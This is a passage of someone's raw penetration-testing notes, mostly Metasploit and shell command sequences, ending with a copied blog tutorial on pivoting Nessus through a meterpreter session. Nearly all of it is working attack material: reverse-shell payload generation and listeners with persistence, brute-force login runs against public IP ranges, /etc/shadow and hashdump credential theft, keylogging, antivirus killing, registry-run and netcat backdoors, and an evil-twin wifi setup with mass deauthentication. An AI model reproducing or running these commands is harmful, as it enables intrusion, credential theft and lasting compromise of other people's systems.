  549. ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.6.55 LPORT=443 R | ./msfencode -t exe -c 5 -o /tmp/bob.exe
  550.  
  551. # attacker listen
  552. use exploit/multi/handler
  553. set PAYLOAD windows/meterpreter/reverse_tcp
  554. set LHOST 192.168.6.55
  555. set LPORT 443
  556. set ExitOnSession false
  557. # set AutoRunScript pathto script you want to autorun after exploit is run
  558. set AutoRunScript persistence -r 192.168.6.55 -p 443 -A -X -i 30
  559.  
  560. exploit -j -z
  561.  
  562.  
  563. # armatage DONT USE THIS JUIST USE BIN INSTALL FROM WEBSITE .. INCLUDES FULL AND POSTGRES BINS
  564. apt-get install mysql-server -y
  565. /etc/init.d/mysql start
  566.  
  567. mysqladmin -u root -ppassword password toor
  568. /pentest/exploits/framework/msfrpcd -f -U msf -P test -t Basic
  569.  
  570. # armatage DONT USE THIS METHOD USE THE BIN FROM WEBSITE IT HAS ITS OWN POSTGRES
  571.  
  572. apt-get install -y postgresql
  573.  
  574. apt-get install libpq-dev -y
  575.  
  576. gem install postgres
  577.  
  578. /etc/init.d/postgresql start
  579. su -
  580. su - postgres
  581.  
  582.  
  583. createuser msf_user -P
  584. createdb --owner=msf_user msf
  585.  
  586. /pentest/exploits/framework/msfrpcd -f -U msf -P msf -t Basic
  587. /pentest/exploits/framework/armitage
  588.  
  589.  
  590. ----
  591.  
  592.  
  593. # ssh
  594. use auxiliary/scanner/ssh/ssh_login
  595.  
  596. #set RHOSTS_FILE "C:/backup/wordlist/targests.txt"
  597. set RHOSTS 192.59.139.135 192.59.139.136 192.59.139.140 192.116.61.25 192.116.61.26 192.116.61.34
  598. # also set RHOSTS file://bla
  599. # set USER_FILE "C:/backup/wordlist/password_large.txt"
  600. set USERPASS_FILE "C:/backup/wordlist/root_userpass.txt"
  601. set VERBOSE true
  602. set STOP_ON_SUCCESS true
  603. set BRUTEFORCE_SPEED 5
  604. # set this to the number of host
  605. set THREADS 6
  606.  
  607. run
  608.  
  609. use auxiliary/gather/dns_enum
  610. set DOMAIN domain.com
  611. run
  612. #smb
  613.  
  614. use auxiliary/scanner/smb/smb_login
  615.  
  616. set RHOSTS file://192.168.8.39
  617. set RHOSTS 127.0.0.1
  618.  
  619. set USER_FILE "C:/wordlist/users.txt"
  620. set PASS_FILE "C:/wordlist/2.txt"
  621. set VERBOSE false
  622. # set to number of host scanning .
  623. set THREADS 16
  624.  
  625. set STOP_ON_SUCCESS true
  626. set VERBOSE false
  627.  Name                             Value
  628.  ----                             -----
  629.  BLANK_PASSWORDS                  false
  630.  BRUTEFORCE_SPEED                 5
  631.  ConnectTimeout                   10
  632.  DCERPC::ReadTimeout              10
  633.  DCERPC::fake_bind_multi          true
  634.  DCERPC::fake_bind_multi_append   0
  635.  DCERPC::fake_bind_multi_prepend  0
  636.  DCERPC::max_frag_size            4096
  637.  DCERPC::smb_pipeio               rw
  638.  MaxGuessesPerService             0
  639.  MaxGuessesPerUser                0
  640.  MaxMinutesPerService             0
  641.  NTLM::SendLM                     true
  642.  NTLM::SendNTLM                   true
  643.  NTLM::SendSPN                    true
  644.  NTLM::UseLMKey                   false
  645.  NTLM::UseNTLM2_session           true
  646.  NTLM::UseNTLMv2                  true
  647.  PRESERVE_DOMAINS                 true
  648.  REMOVE_PASS_FILE                 false
  649.  REMOVE_USERPASS_FILE             false
  650.  REMOVE_USER_FILE                 false
  651.  RHOST                            file:/home/rmccurdy/high
  652.  
  653. # http
  654.  
  655. use auxiliary/scanner/http/http_login
  656. set AUTH_URI /folder?dcPath=ha-datacenter
  657. set RHOSTS 127.0.0.1 127.0.0.1 127.0.0.1
  658. set VERBOSE true
  659. run
  660. back
  661.  
  662. # telnet
  663. use auxiliary/scanner/telnet/telnet_login
  664. set RHOSTS 127.0.0.1,49,50
  665.  
  666. set PASS_FILE "C:/wordlist/password_small.txt"
  667. set THREADS 254
  668. run
  669.  
  670. back
  671. # mssql
  672. use auxiliary/scanner/mssql/mssql_login
  673. set RHOSTS 127.0.0.1
  674. set PASS_FILE "C:/wordlist/password_small.txt"
  675. set USERNAME sa
  676. set VERBOSE false
  677. run
  678. back
  679.  
  680.  
  681.  
  682. #ftp
  683. use auxiliary/scanner/ftp/ftp_login
  684. set RHOSTS  127.0.0.1
  685. set PASS_FILE /home/administrator/small.txt
  686. set USER_FILE /home/administrator/small.txt
  687. set BRUTEFORCE_SPEED 1
  688. run
  689.  
  690. #snmp
  691. use auxiliary/scanner/snmp/snmp_login
  692. set RHOSTS  127.0.0.1
  693. set PASS_FILE "C:/wordlist/snmp_default_pass.txt"
  694. set VERBOSE false
  695.  
  696. run
  697.  
  698. nmap --script=smtp-open-relay.nse -p 25 -iL 25 -n
  699. ./sfuzz -T O -f sfuzz-sample/basic.http -S 50.74.10.218 -p 179
  700. # got r00t got r00t ?
  701.  
  702. # bash history very gooOOOd !
  703. updatedb;locate .bash_history
  704.  
  705. # crack with extrem gpu brute force
  706. cat /etc/shadow | grep -v ":\*:"
  707. # use on other servers by checking bash history
  708. updatedb;locate authorized
  709.  
  710. # find files modifyed the past 7 days
  711. find / -type f -mtime -7|egrep -v "(proc|\/sys)"
  712.  
  713. # you can look for other file types sql,*.php,*sql.tar.gz,*pass*,sudousers,/etc/passwd,/root/.ssh or ~/.ssh,password
  714. locate *.sql
  715. locate sql.tar.gz
  716. # what services are listing the part at the top
  717. netstat -na | grep LIS
  718. ---------
  719.  
  720. more notes :
  721. -------------
  722. # class b ADDfff -Pn to not ping ( assume up and no ping scan, it will take longer ) use control + D to end script and save at job
  723. # this will run at 7pm in a screen so you can reattach / check status and Ctrl+c out to save and use nmap -r to resume if need be
  724. at 19:00
  725. screen bash at.sh
  726. # at.sh script
  727. nmap -T5  -p 20,21,80,115,443,989,990 -vvvv -sS  -n --max-rtt-timeout 300ms --max-retries 1 192.159.0.0/16 -oA /home/administrator/rmccurdy/safg/192.159.0.0_fast_ping
  728. # class b external 65k host fast ping scan 7 ports 30min
  729. # Nmap 5.61TEST2 scan initiated Thu Dec 29 21:02:11 2011 as: nmap -T5 -p 20,21,80,115,443,989,990 -vvvv -sS -n --max-rtt-timeout 300ms --max-retries 1 -oA /home/administrator/rmccurdy/safg/192.30.0.0_fast_ping 192.30.0.0/16
  730. # Ports scanned: TCP(7;20-21,80,115,443,989-990) UDP(0;) SCTP(0;) PROTOCOLS(0;)
  731. # Nmap done at Thu Dec 29 21:29:10 2011 -- 65536 IP addresses (40675 hosts up) scanned in 1618.92 seconds
  732.  
  733. nmap -p53 -script dns-zone-transfer -script-args dnszonetransfer.domain=aeiginsurance.com
  734.  
  735.  
  736. # medusa hydra
  737. ./sfuzz -T O -f sfuzz-sample/basic.http -S 50.74.10.218 -p 179
  738.    
  739.  
  740. http://www.foofus.net/~jmk/medusa/medusa.html
  741. medusa -M ftp -H targets -u Anonymous -p KPMG_AUDIT -v 6 -T 30 -g 2 -R 1
  742. medusa -M mysql -H # change the -T for more threds -t is for per host keep it 1 ..
  743. medusa -M ssh -H 22 -u root -p tcr1tt3r -v 6 -g 2 -R 1 -t 1 -T 1
  744. medusa -h 192.168.1.103 -u administrator -P passwords.txt -e ns -M smbnt
  745.  
  746.  
  747. mysql -u root -P mysqlpass.txt -v 6 -T 1 -g 2 -R 1
  748. nmap --script=smtp-open-relay.nse -p 25 -iL 25 -n
  749.  
  750. # email over telnet
  751. RSET
  752. HELO
  753. MAIL FROM:<root@whatismyip.com>
  754. RCPT TO:<"freeload101@yahoo.com">
  755. data
  756. this is a test from KPMG w00t
  757. .
  758. --------
  759. route add 10.101.14.0 netmask 255.255.255.0 gw 10.101.13.1 dev eth05
  760.  
  761. .\nmap -script smb-check-vulns.nse --script-args=unsafe=1 -p445 10.104.101.59
  762. .\nmap --script smb-enum-shares.nse -p445 10.104.101.59
  763. .\nmap --script smb-enum-users.nse -p445 10.104.101.59
  764. .\nmap.exe --script smtp-commands.nse -pT:25,465,587
  765. .\nmap.exe --script smtp-enum-users.nse -pT:25,465,587
  766. a
  767.  
  768. # sid enum using nmap and metasploits sid.txt 1307 sids in ~8 seconds
  769. nmap -n --script=oracle-sid-brute -p 1521-1560 192.168.1.141
  770.  
  771. # try 1255 user/pass
  772. # requires valid SID  ( default is XE )
  773. # Performed 1245 guesses in 3 seconds, average tps: 415
  774. nmap --script oracle-brute -p  1521-1560 --script-args oracle-brute.sid=XE  -n 192.168.1.141
  775.  
  776. # oracle shell using OAT Oracle Audit Tool
  777. ose.bat -s 192.168.1.141 -u SYS -p CHANGE_ON_INSTALL -d XE -t Windows
  778.  
  779. # route all to 10.127.120.97
  780. route add 0.0.0.0 mask 0.0.0.0 10.127.120.97
  781. # route 75.131.211.0 to VPN or other connectoin
  782. route add 75.131.211.0 mask 255.255.255.0 192.168.77.254
  783. # route rmccurdy over VPN
  784. route add 75.131.211.0 mask 255.255.255.0 10.31.128.1
  785.  
  786.  
  787. warvox notes:
  788. * you also have to contact support and have IAX unlocked on the account
  789. · Normally I have 3 max threads and set it for 15-20 sec then with sql get the completed = 0 and run them thought again with 53 sec ringtime.
  790. · Let me know if you need any help
  791. google warvox for general notes "login etc .. just read all of it please ... use vitelity as the provider )
  792. 3 at a time max ..
  793. screen
  794. ruby warvox.rb ( run warvox in screen so you can screen -r if you get dropped google screen Manuel ... )
  795. use SELF as the caller ID
  796. ranges are 15555555555:15555555555
  797. or 155555XXX
  798.  
  799.  
  800. SELECT * FROM DIAL_RESULTS where completed = 'f' and dial_job_id >= '68' and busy = 'f' and ringtime <= '52';
  801. * if don.t add the .and ringtime <= '52' I get 2K hits . I would assume this is because it if did not answer it labeled it as not completed instead of labeling it timeout for some reason ?
  802. * ~700 ringtime <= '52' with no data file... some high ringtimes but most were instant busy signal but not marked as complete or busy with no data file
  803. SELECT count(*) FROM DIAL_RESULTS where dial_job_id = '110' and line_type = 'voice' ;
  804. SELECT count(*) FROM DIAL_RESULTS where dial_job_id = '110' and line_type = 'fax' ;
  805. SELECT count(*) FROM DIAL_RESULTS where dial_job_id = '110' and line_type = 'modem' ;
  806. SELECT * FROM DIAL_RESULTS where dial_job_id = '110' and busy = 't';
  807.    
  808.  
  809. rcracki_mt /s2/LM/lm_alpha-numeric-symbol32-space#1-7_* -f /usr/local/sbin/hash
  810. rcrack /s2/LM/lm_alpha-numeric-symbol32-space#1-7_* -f hash2
  811. # example input file 4ee is null or blank
  812. # Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  813. #notes
  814. http://ob-security.info/?tag=hashcat
  815.  
  816.  
  817.  
  818.  
  819.  
  820. wget -O giskismet-0.02.tar.gz \
  821. "http://my-trac.assembla.com/giskismet/browser/tags/giskismet-0.02.tar.gz?format=raw"
  822. tar -xzvf giskismet-0.02.tar.gz
  823. rm giskismet-0.02.tar.gz
  824.  
  825. We need a few packages first.
  826.  
  827. apt-get update
  828. apt-get install libxml-libxml-perl libdbi-perl libdbd-sqlite3-perl -y
  829.  
  830. Do the install
  831.  
  832.  
  833. cd giskismet-0.02
  834. perl Makefile.PL
  835. make
  836. make install
  837.  
  838.  
  839.  
  840. giskismet -x wardrive.netxml
  841. giskismet -q "select * from wireless" -o output.kml
  842.  
  843.  
  844. giskismet -q 'select * from wireless where ESSID like "_%"' wireless.dbl  -o ouput2.kml
  845.  
  846.  
  847. Before we map our dat
  848.  
  849. # following steps are for BT4:
  850. # edit the kismet.conf and add the /dev/ttyUSB0 etc .. (find / -name kismet.conf )
  851. # load the kernal mod for garmin gps
  852. modprobe garmin_gps
  853. # plugin the the garmion GPS18 USB puck
  854. # if I dont run this command it hangs and kill -9 will not even work so have to reboot
  855. mount -t usbfs none /proc/bus/usb/
  856. # setup gpsd shoud show changy bits so you know it is trying to lock !
  857. dpkg-reconfigure gpsd
  858. #start gpsd
  859. /etc/init.d/gpsd stop
  860. gpsd -N -n -D 2 /dev/ttyUSB0
  861. # test
  862. ls -al /dev/ttyUSB0
  863. xgps
  864. #also test by
  865. telnet localhost 2947
  866. # in kismet you will get nodata untill it has a lock ( this took upto 500seconds in xgps ) you can run XGPS and KISMET at the same time.
  867.  
  868. /etc/init.d/wicd stop
  869. /etc/init.d/networking stop
  870. killall dhclient dhcpcd
  871.    
  872.  
  873.  
  874.  
  875. # ssh logins
  876. use auxiliary/scanner/ssh/ssh_login
  877. set RHOSTS 10.13.102.2,177
  878. set USER_FILE "C:/wordlist/password_small.txt"
  879. set RHOSTS_FILE "C:/wordlist/targests.txt"
  880. run
  881. back
  882. use auxiliary/gather/dns_enum
  883. set DOMAIN 10.21.1.69
  884. run
  885.  
  886.  
  887.  
  888.  
  889.  
  890. --------------------------------------
  891.  
  892. airbase notes
  893. ------------
  894. mass deauth
  895. # broken because you need listen on the right channel before you deauth ... so I need channel and sesstion and ap info all in one line ..
  896. # cleanup
  897. rm -f clients*.csv
  898. # dump clients
  899. airodump-ng mon0 -o csv -w clients &
  900. # lets sleep on it we need station ids
  901. sleep 60
  902. killall airodump-ng
  903. # make script to mass deauth
  904. grep -ia -A 10000  Station clients*.csv |egrep -v "(not|Station)" | sed 's/,/ /g' | awk '{print "aireplay-ng -0 1 -a",$8,"mon0 --ignore-negative-one  -c",$1}'|grep : > killclients
  905. bash -x killclients
  906. -----------------------------------------------
  907. gogogo
  908. ----------------
  909. ^Croot@bt:/stuff/airbase# cat GO
  910.  
  911. killall  avahi-daemon avahi-daemon NetworkManager wpa_supplicant
  912. killall dhcpd3 dhclient dhclient3 dhcpcd dhcpd
  913. airmon-ng start wlan1
  914. sleep 5
  915. xterm -e "airbase-ng -c 6 -P mon0 -v" &
  916. sleep 5
  917. ifconfig at0 up 10.0.0.1 netmask 255.255.255.0 &
  918. dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0 &
  919. sleep 5
  920. cd /pentest/exploits/framework &
  921. xterm -e "tcpdump -i at0 -n port 67 and port 68"  &
  922. sleep 5
  923. xterm -e "/pentest/exploits/framework/msfconsole -r /pentest/exploits/framework/karma.rc"
  924. ------------------
  925. # depends for airdcrack
  926.  
  927. apt-get install build-essential  -y
  928. apt-get install libssl-dev -y
  929. apt-get install openssl-dev -y
  930. apt-get install partimage gparted lynx links curl nmap iotop screen medusa trafshow wireshark -y --force-yes
  931. # more depends set autopwn
  932. apt-get install upx-ucl upx-nrv -y
  933. apt-get install build-essential ruby libruby rdoc libyaml-ruby libzlib-ruby libopenssl-ruby libdl-ruby libreadline-ruby libiconv-ruby libgtk2-ruby libglade2-ruby subversion sqlite3 libsqlite3-ruby irb -y
  934. apt-get install ruby libruby rdoc -y
  935. apt-get install libyaml-ruby -y
  936. apt-get install libzlib-ruby -y
  937. apt-get install libopenssl-ruby -y
  938. apt-get install libdl-ruby -y
  939. apt-get install libreadline-ruby -y
  940. apt-get install libiconv-ruby -y
  941. apt-get install rubygems -y
  942.  
  943. #apt-get install postgresql postgresql-client postgresql-contrib -y
  944. apt-get install pgadmin3 -y
  945. apt-get install python-pymssql -y
  946. gem1.8 install rails
  947. # get set and msf
  948. mkdir /pentest/
  949. mkdir /pentest/exploits
  950. cd /pentest/exploits
  951. # check out /install  aircrack latest
  952. svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
  953. cd aircrack-ng
  954. make clean
  955. make
  956. make install
  957. airodump-ng-oui-update
  958. # create mon0
  959. airmon-ng start wlan1
  960. # start airbase on mon0 it creates at0 to us with dhcpd ! ( may not need to include channel ... )
  961. airbase-ng -c 6 -P mon0 -v
  962. # install dhcp3 server
  963. apt-get install  dhcp3-server -y
  964. -----------------------------------------------------------
  965. # DHCP CONF
  966. cat /etc/dhcp3/dhcpd.conf
  967. ----------------------------------------------------------------
  968. option domain-name-servers 10.0.0.1;
  969. default-lease-time 60;
  970. max-lease-time 72;
  971. ddns-update-style none;
  972. authoritative;
  973. log-facility local7;
  974. subnet 10.0.0.0 netmask 255.255.255.0 {
  975. range 10.0.0.100 10.0.0.254;
  976. option routers 10.0.0.1;
  977. option domain-name-servers 10.0.0.1;
  978. }
  979. -------------------------------------------------------------------------------
  980. # setup at0 interface that airbase created to listen on IP configured for dhcp server
  981. ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
  982. # start dhcp server
  983. dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
  984. # cd to framework root ..
  985. cd /pentest/exploits/framework
  986. wget http://digitaloffense.net/tools/karma.rc -O karma.rc
  987. # start msfconsole using the mass client sides basicly karma.rc
  988. msfconsole -r karma.rc
  989. # start TCP dump looking for DHCP requests from the remote host !
  990. tcpdump -i at0 -n port 67 and port 68
  991. # mass client side too buggy ... to many iframes ... come back to it ... try SMB_REPLAY attack ...? or limit client side attacks ?
  992. # for mass client side attack using etterfilter for targets:
  993. apt-get install ettercap -y
  994. # run mass client side attack
  995. cd /pentest/exploits/fasttrack
  996. fast-track.py -i
  997. # choose mass client side attack etc and run metasploitloadfile manuely ...
  998. # when all is running etc ....  start msfconsole with the metasploitloadfile script in the base folder of fasttrack
  999. msfconsole -r metasploitloadfile
  1000. http://digitaloffense.net/tools/karma.rc
  1001. +-+-+-
  1002. airmon-ng start wlan0
  1003. airbase-ng -c 9 -P -C60  -z 2 -W 1 mon0
  1004. ifconfig wlan0 up 10.0.0.1 netmask 255.255.255.0
  1005.     dhcpd3 -cf /etc/dhcp3/dhcpd.conf -f log wlan0
  1006. killall dhclient dhcpcd dhclient3
  1007. airmon-ng start wlan1
  1008. airbase-ng -c 9 -P -C60  -z 2 -W 1 mon1
  1009. ifconfig wlan1 up 10.0.0.1 netmask 255.255.255.0
  1010. dhcpd3 -cf /etc/dhcp3/dhcpd.conf -f log wlan1
  1011. iptables --table nat --append POSTROUTING --out-interface eth1 -j MASQUERADE
  1012. iptables --append FORWARD --in-interface at0 -j ACCEPT
  1013. echo 1 > /proc/sys/net/ipv4/ip_forward
  1014. #airbase-ng -c 9 -P -C60  -z 2 -W 1 mon1
  1015. 00:0C:43:41:46:34  -37           13            2        0   6  54e. WPA  TKIP   PSK  rmccurdyDOTcom1                                                                      
  1016.  
  1017. airbase-ng -c 6 -a  00:0C:43:41:46:34 -C60  -z 2 -W 1 -v --essid rmccurdyDOTcom1 mon0
  1018. dhcpd3 -cf /etc/dhcp3/dhcpd.conf -f log wlan1
  1019. i
  1020. dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
  1021. tcpdump -i at0 -n port 67 and port 68
  1022.  armatage
  1023. apt-get install -y postgresql
  1024. apt-get install libpq-dev -y
  1025. gem install postgres
  1026.  
  1027. /etc/init.d/postgresql start
  1028.  
  1029.  
  1030.  
  1031. su -
  1032. su - postgres
  1033.  
  1034.  
  1035. createuser msf_user -P
  1036. createdb --owner=msf_user msf
  1037.  
  1038. /pentest/exploits/framework/msfrpcd -f -U msf -P msf -t Basic
  1039. /pentest/exploits/framework/armitage
  1040. wifi notes
  1041. ------------------------
  1042. internet@rmccurdydotcom /cygdrive/c/temp
  1043. # egrep "BSSID|<manuf>|<max_signal_dbm>|<ssid>" "Kismet-20110929-11-17-47-1.net
  1044. xml" | tr -d '\n' |  awk '{gsub("<BSSID>",",\n"); print}' | sed -e 's/<\/BSSID>
  1045. /,/g' -e 's/        <manuf>//g' -e 's/<\/manuf>//g' -e 's/          <max_signal_dbm>/,/
  1046. g' -e 's/<\/max_signal_dbm>/,/'g -e 's/                <ssid>/,/g' -e 's/<\/ssid>//
  1047. g'> 2.csv
  1048. internet@rmccurdydotcom /cygdrive/c/temp
  1049. # load the kernal mod for garmin gps
  1050. modprobe garmin_gps
  1051. # plugin the the garmion GPS18 USB puck
  1052. # if I dont run this command it hangs and kill -9 will not even work so have to reboot
  1053. mount -t usbfs none /proc/bus/usb/
  1054. # setup gpsd
  1055. dpkg-reconfigure gps
  1056. # test
  1057. ls -al /dev/ttyUSB0
  1058. xgps
  1059. #also test by
  1060. telnet localhost 2947
  1061. # in kismet you will get nodata untill it has a lock ( this took upto 500seconds in xgps ) you  can run XGPS and KISMET at the same time.
  1062.  
  1063. ------------------------
  1064.  
  1065.  
  1066.  
  1067.  
  1068. ----------------------
  1069.  
  1070. use exploit/multi/handler
  1071. set PAYLOAD windows/meterpreter/reverse_tcp
  1072. set LHOST rmccurdy.com
  1073. set LPORT 21
  1074. set ExitOnSession false
  1075. # set AutoRunScript pathto script you want to autorun after exploit is run
  1076. set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
  1077.  
  1078. exploit -j -z
  1079.  
  1080.  
  1081.  
  1082. # file_autopwn
  1083. rm -Rf /tmp/1
  1084. mkdir /tmp/1
  1085. rm -Rf ~/.msf3
  1086.  
  1087. wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressReleases/Press%20Releases/nga10_02.pdf
  1088.  
  1089. ./msfconsole
  1090.  
  1091. db_driver sqlite3
  1092. db_create pentest11
  1093. setg LHOST 75.139.158.51
  1094. setg LPORT 21
  1095. setg SRVPORT 21
  1096. setg LPORT_WIN32 21
  1097.  
  1098. setg INFILENAME /tmp/file3.pdf
  1099.  
  1100.  
  1101. use auxiliary/server/file_autopwn
  1102.  
  1103. set OUTPATH /tmp/1
  1104.  
  1105. set URIPATH /msf
  1106. set SSL true
  1107. set ExitOnSession false
  1108. set PAYLOAD windows/meterpreter/reverse_tcp
  1109. setg PAYLOAD windows/meterpreter/reverse_tcp
  1110. set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
  1111. run
  1112.  
  1113.  
  1114.  
  1115. # shows all the scripts
  1116. run [tab]
  1117.  
  1118. # persistence! broken ...if you use DNS name ..
  1119. run persistence -r 75.139.158.51 -p 21 -A -X -i 30
  1120. # new method run persistence -U -i 5 -p 443 -r 192.168.1.71
  1121.  
  1122. run get_pidgin_creds
  1123.  
  1124. idletime
  1125. sysinfo
  1126.  
  1127.  
  1128. # SYSTEM SHELL ( pick a proc that is run by system )
  1129. migrate 376
  1130. shell
  1131.  
  1132. # session hijack tokens
  1133. use incognito
  1134. impersonate_token "NT AUTHORITY\\SYSTEM"
  1135.  
  1136. # eslcate to system
  1137. use priv
  1138. getsystem
  1139.  
  1140.  
  1141. execute -f cmd.exe -H -c -i -t
  1142. execute -f cmd.exe -i -t
  1143.  
  1144. # list top used apps
  1145. run prefetchtool -x 20
  1146.  
  1147. # list installed apps
  1148. run prefetchtool -p
  1149.  
  1150. run get_local_subnets
  1151.  
  1152. # find and download files
  1153. run search_dwld "%USERPROFILE%\\my documents" passwd
  1154. run search_dwld "%USERPROFILE%\\desktop passwd
  1155. run search_dwld "%USERPROFILE%\\my documents" office
  1156. run search_dwld "%USERPROFILE%\\desktop" office
  1157.  
  1158. # alternate
  1159. download -r "%USERPROFILE%\\desktop"  ~/
  1160. download -r "%USERPROFILE%\\my documents"  ~/
  1161.  
  1162. # alternate to shell not SYSTEM
  1163. # execute -f cmd.exe -H -c -i -t
  1164.  
  1165.  
  1166. # does some run wmic commands etc
  1167. run winenum
  1168.  
  1169.  
  1170.  
  1171. # rev shell the hard way
  1172. run scheduleme -m 1 -u /tmp/nc.exe -o "-e cmd.exe -L -p 8080"
  1173.  
  1174. # An example of a run of the file to download via tftp of Netcat and then running it as a backdoor.
  1175. run schtasksabuse-dev -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
  1176. run schtasksabuse -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
  1177.  
  1178. # vnc / port fwd for linux
  1179. run vnc
  1180.  
  1181. # priv esc
  1182. run kitrap0d
  1183.  
  1184.  
  1185.  
  1186. run getgui
  1187.  
  1188. # somewhat broken .. google sdt cleaner  NtTerminateProcess !@?!?!
  1189. run killav
  1190.  
  1191. run winemun
  1192.  
  1193. run memdump
  1194.  
  1195. run screen_unlock
  1196.  
  1197. upload /tmp/system32.exe C:\\windows\\system32\\
  1198. reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
  1199. reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v system32 -d "C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe"
  1200. reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v system32
  1201. reg enumkey -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list
  1202. reg setval -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v sys
  1203. reg queryval -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v system32
  1204. upload /neo/wallpaper1.bmp "C:\\documents and settings\\pentest3\\local settings\\application data\\microsoft\\"
  1205.  
  1206.  
  1207.  
  1208.  
  1209. getuid
  1210. ps
  1211. getpid
  1212. keyscan_start
  1213. keyscan_dump
  1214. migrate 520
  1215. portfwd add -L 104.4.4 -l 6666 -r 192.168.1.1 -p 80"
  1216. portfwd add -L 192.168.1.1 -l -r 10.5.5.5 -p 6666
  1217.  
  1218. shell
  1219. run myremotefileserver_mserver -h
  1220. run myremotefileserver_mserver -p 8787
  1221.  
  1222. run msf_bind
  1223. run msf_bind -p 1975
  1224. rev2self
  1225. getuid
  1226.  
  1227. getuid
  1228.  
  1229.  
  1230.  
  1231. enumdesktops
  1232. grabdesktop
  1233.  
  1234. run deploymsf -f framework-3.3-dev.exe
  1235.  
  1236. run hashdump
  1237. run metsvc
  1238. run scraper
  1239. run checkvm
  1240. run keylogrecorder
  1241. run netenum -fl -hl localhostlist.txt -d google.com
  1242. run netenum -rl -r 10.192.0.50-10.192.0.254
  1243. run netenum -st -d google.com
  1244. run netenum -ps -r 10.192.0.50-254
  1245.  
  1246.  
  1247. # Windows Login Brute Force Meterpreter Script
  1248. run winbf -h
  1249.  
  1250. # upload a script or executable and run it
  1251. uploadexec
  1252.  
  1253.  
  1254. # Using Payload As A Backdoor  from a shell
  1255.  
  1256. REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run /v firewall /t REG_SZ /d "c:\windows\system32\metabkdr.exe" /f
  1257. at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\metabkdr.exe"
  1258. SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\metabkdr.exe"  /ED 11/11/2011
  1259.  
  1260.  
  1261.  
  1262. # kill AV this will not unload it from mem it needs reboot or kill from memory still ... Darkspy, Seem, Icesword GUI can kill the tasks
  1263. catchme.exe  -K "c:\Program Files\Kaspersky\avp.exe"
  1264. catchme.exe  -E "c:\Program Files\Kaspersky\avp.exe"
  1265. catchme.exe  -O "c:\Program Files\Kaspersky\avp.exe" dummy
  1266.  
  1267. Nessus Scanning through a Metasploit Meterpreter Session
  1268. By
  1269. Mark Baggett
  1270. on March 16, 2010 6:44 AM | Permalink
  1271.  
  1272. By Mark Baggett
  1273.  
  1274. Scenario: You are doing a penetration test. The client's internet face is locked down pretty well. No services are exposed externally and only HTTP/HTTPS are allowed OUT of the corporate firewall. You email in a carefully crafted email with the meterpreter attacked. An accommodating users is more than happy to click your attachment giving you meterpreter access to their machine. Now what? How about using Nessus to scan all the services on their internal network? Here is a tutorial on how to do it.
  1275.  
  1276. The Players
  1277. Attacker 172.16.186.132
  1278. Victim 172.16.186.126
  1279.  
  1280. Step 1 - After you have meterpreter access install OpenSSH on the victim's computer. Joff Thyer, packet guru, crazy aussie and all around smart guy did a great job of outlining the install process on his blog. I pretty much just followed his instructions here.
  1281.  
  1282. Step 2 - After you've installed OpenSSH and setup your account use Meterpreters PORTFWD command to forward a port from the attacker's machine to the SSH listener on the victim's machine. For example:
  1283.  
  1284. meterpreter> portfwd add -L 172.16.186.132 -l 8000 -r 172.16.186.128 -p 22
  1285.  
  1286. This command sets up a listener on port 8000 of the attacker's IP (172.16.186.132) and forwards packets to port 22 on the victim's machine (172.16.186.128).
  1287.  
  1288.  
  1289. Step 3 - SSH into the portfwd port you just created and setup a dynamic port forwarder on your machine. For example:
  1290.  
  1291. # ssh -D 127.0.0.1:9000 -p 8000 username@172.16.186.132
  1292.  
  1293. This command sets up a SOCKS4 proxy on port 9000 which is forwarded through the SSH session on the victim.
  1294.  
  1295. Step 4 - Use PROXYCHAINS to forward your nessusd traffic through the SOCKS4 listener on port 9000. This is as simple as changing the TCP port on the last line of /etc/proxychains.conf from its default of 9050 to port 9000 and launching nessusd through proxychains as follows:
  1296.  
  1297. # proxychains /usr/sbin/nessusd -D
  1298.  
  1299. Step 5 - Start the nessus client and do you scan.
  1300.  
  1301. Preparing for a custom command line OpenSSH Installation in your lab
  1302.  
  1303. The basic steps to prepare a command line OpenSSH installation for Windows are as follows:
  1304.  
  1305. 1. Download the setupssh.exe installation package from http://sshwindows.sourceforge.net/download
  1306.  
  1307. 2. Run the GUI installer package on your Windows lab/test machine. I suggest accepting the default program location of C:\Program Files\OpenSSH
  1308.  
  1309. 3. Get a full copy of all of the files under the directory C:\Program Files\OpenSSH onto a USB flash drive or other favorite media. Copy recursively with XCOPY and make sure you fully retain the directory structure.
  1310.  
  1311. 4. Export the following registry keys using the REG EXPORT command as follows:
  1312.  
  1313. REG EXPORT .HKLM\SOFTWARE\Cygnus Solutions. 1.REG
  1314. REG EXPORT .HKLM\SYSTEM\CurrentControlSet\Services\OpenSSHd. 2.REG
  1315. REG EXPORT .HKLM\SYSTEM\ControlSet001\Services\OpenSSHd. 3.REG
  1316.  
  1317. 5. Concatenate all of these registry files together into one file.
  1318. TYPE 1.REG 2.REG 3.REG >OPENSSH.REG
  1319.  
  1320. 6. Save this OPENSSH.REG file into your local copy of all of the openssh directory structure.
